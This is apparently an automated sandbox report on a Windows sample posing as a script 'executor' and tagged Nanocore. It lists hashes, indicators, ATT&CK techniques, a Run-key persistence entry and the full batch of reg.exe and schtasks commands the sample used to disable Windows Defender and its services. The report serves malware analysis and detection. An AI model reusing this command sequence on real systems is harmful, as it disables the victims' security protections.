Analysis
-
max time kernel
87s -
max time network
88s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
17-12-2024 19:36
Behavioral task
behavioral1
Sample
XtasyExecutorV1.0.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
XtasyExecutorV1.0.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
XtasyExecutorV1.0.exe
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral4
Sample
XtasyExecutorV1.0.exe
Resource
win11-20241007-en
General
-
Target
XtasyExecutorV1.0.exe
-
Size
203KB
-
MD5
b8fb078ab0ff9ca107d79112a1a56255
-
SHA1
cebcb36d55bb63688bd9ffbf7d372ba41b0e959e
-
SHA256
2d73aa44284a435c2cc78b6a80a4326f42a28dfa598e5dfd20ba3f612afdcd37
-
SHA512
1a817eb1043122eb183821558cd9541f4a34f76551f52040f8c2e3caf8dd082a88d80799be868bbb84fdf339cb462a63bb14bceae869345485b565a19d01f1f9
-
SSDEEP
3072:AzEqV6B1jHa6dtJ10jgvzcgi+oG/j9iaMP2s/HIseXxluxTkQ0yyMH+elFEGxdb8:ALV6Bta6dtJmakIM5NhkQl3EGrbmMZ3k
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Nanocore family
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\IMAP Manager = "C:\\Program Files (x86)\\IMAP Manager\\imapmgr.exe" XtasyExecutorV1.0.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA XtasyExecutorV1.0.exe -
Modifies Security services 2 TTPs 4 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\IMAP Manager\imapmgr.exe XtasyExecutorV1.0.exe File opened for modification C:\Program Files (x86)\IMAP Manager\imapmgr.exe XtasyExecutorV1.0.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 33 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XtasyExecutorV1.0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Suspicious behavior: EnumeratesProcesses 36 IoCs
pid Process 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe 3796 XtasyExecutorV1.0.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3796 XtasyExecutorV1.0.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3796 XtasyExecutorV1.0.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3796 wrote to memory of 4000 3796 XtasyExecutorV1.0.exe 77 PID 3796 wrote to memory of 4000 3796 XtasyExecutorV1.0.exe 77 PID 3796 wrote to memory of 4000 3796 XtasyExecutorV1.0.exe 77 PID 4000 wrote to memory of 2536 4000 cmd.exe 79 PID 4000 wrote to memory of 2536 4000 cmd.exe 79 PID 4000 wrote to memory of 2536 4000 cmd.exe 79 PID 4000 wrote to memory of 1644 4000 cmd.exe 80 PID 4000 wrote to memory of 1644 4000 cmd.exe 80 PID 4000 wrote to memory of 1644 4000 cmd.exe 80 PID 4000 wrote to memory of 4312 4000 cmd.exe 81 PID 4000 wrote to memory of 4312 4000 cmd.exe 81 PID 4000 wrote to memory of 4312 4000 cmd.exe 81 PID 4000 wrote to memory of 2344 4000 cmd.exe 82 PID 4000 wrote to memory of 2344 4000 cmd.exe 82 PID 4000 wrote to memory of 2344 4000 cmd.exe 82 PID 4000 wrote to memory of 3636 4000 cmd.exe 83 PID 4000 wrote to memory of 3636 4000 cmd.exe 83 PID 4000 wrote to memory of 3636 4000 cmd.exe 83 PID 4000 wrote to memory of 3116 4000 cmd.exe 84 PID 4000 wrote to memory of 3116 4000 cmd.exe 84 PID 4000 wrote to memory of 3116 4000 cmd.exe 84 PID 4000 wrote to memory of 3012 4000 cmd.exe 85 PID 4000 wrote to memory of 3012 4000 cmd.exe 85 PID 4000 wrote to memory of 3012 4000 cmd.exe 85 PID 4000 wrote to memory of 4408 4000 cmd.exe 86 PID 4000 wrote to memory of 4408 4000 cmd.exe 86 PID 4000 wrote to memory of 4408 4000 cmd.exe 86 PID 4000 wrote to memory of 3500 4000 cmd.exe 87 PID 4000 wrote to memory of 3500 4000 cmd.exe 87 PID 4000 wrote to memory of 3500 4000 cmd.exe 87 PID 4000 wrote to memory of 1364 4000 cmd.exe 88 PID 4000 wrote to memory of 1364 4000 cmd.exe 88 PID 4000 wrote to memory of 1364 4000 cmd.exe 88 PID 4000 wrote to memory of 416 4000 cmd.exe 89 PID 4000 wrote to memory of 416 4000 cmd.exe 89 PID 4000 wrote to memory of 416 4000 cmd.exe 89 PID 4000 wrote to memory of 324 4000 cmd.exe 90 PID 4000 wrote to memory of 324 4000 cmd.exe 90 PID 4000 wrote to memory of 324 4000 cmd.exe 90 PID 4000 wrote to memory of 1164 4000 cmd.exe 91 PID 4000 wrote to memory of 1164 4000 cmd.exe 91 PID 4000 wrote to memory of 1164 4000 cmd.exe 91 PID 4000 wrote to memory of 4196 4000 cmd.exe 92 PID 4000 wrote to memory of 4196 4000 cmd.exe 92 PID 4000 wrote to memory of 4196 4000 cmd.exe 92 PID 4000 wrote to memory of 2704 4000 cmd.exe 93 PID 4000 wrote to memory of 2704 4000 cmd.exe 93 PID 4000 wrote to memory of 2704 4000 cmd.exe 93 PID 4000 wrote to memory of 1828 4000 cmd.exe 94 PID 4000 wrote to memory of 1828 4000 cmd.exe 94 PID 4000 wrote to memory of 1828 4000 cmd.exe 94 PID 4000 wrote to memory of 4900 4000 cmd.exe 95 PID 4000 wrote to memory of 4900 4000 cmd.exe 95 PID 4000 wrote to memory of 4900 4000 cmd.exe 95 PID 4000 wrote to memory of 2508 4000 cmd.exe 96 PID 4000 wrote to memory of 2508 4000 cmd.exe 96 PID 4000 wrote to memory of 2508 4000 cmd.exe 96 PID 4000 wrote to memory of 1688 4000 cmd.exe 97 PID 4000 wrote to memory of 1688 4000 cmd.exe 97 PID 4000 wrote to memory of 1688 4000 cmd.exe 97 PID 4000 wrote to memory of 1684 4000 cmd.exe 98 PID 4000 wrote to memory of 1684 4000 cmd.exe 98 PID 4000 wrote to memory of 1684 4000 cmd.exe 98 PID 4000 wrote to memory of 2040 4000 cmd.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\XtasyExecutorV1.0.exe"C:\Users\Admin\AppData\Local\Temp\XtasyExecutorV1.0.exe"1⤵
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3796 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\d3251ba7.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵
- System Location Discovery: System Language Discovery
PID:2536
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:1644
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:4312
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:2344
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:3636
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:3116
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:3012
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:4408
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:3500
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1364
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:416
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:324
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:1164
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵
- System Location Discovery: System Language Discovery
PID:4196
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:2704
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:1828
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:4900
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:2508
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:1688
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:1684
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:2040
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵
- System Location Discovery: System Language Discovery
PID:4544
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵
- System Location Discovery: System Language Discovery
PID:1368
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵
- System Location Discovery: System Language Discovery
PID:1572
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵
- System Location Discovery: System Language Discovery
PID:3804
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵
- System Location Discovery: System Language Discovery
PID:1140
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1704
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:3296
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:2496
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:4936
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
- System Location Discovery: System Language Discovery
PID:3576
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD510e9d7377b7fd4df43145ae4c8b136b3
SHA14002ba143ff336f631d36c6afd93464822ba541e
SHA2561b1b51dbe669925f941f0b3e04c7d00f29af6746179a7b72a58391720cd23da1
SHA512c28b439ab8fdc3e8da7217250b5f13be1613b0acf5677758d65fe7e46f0abdea08db73ecce5ca38fb88c8c25064fddc04e1f23d4d70058d27a0ba23a980fe885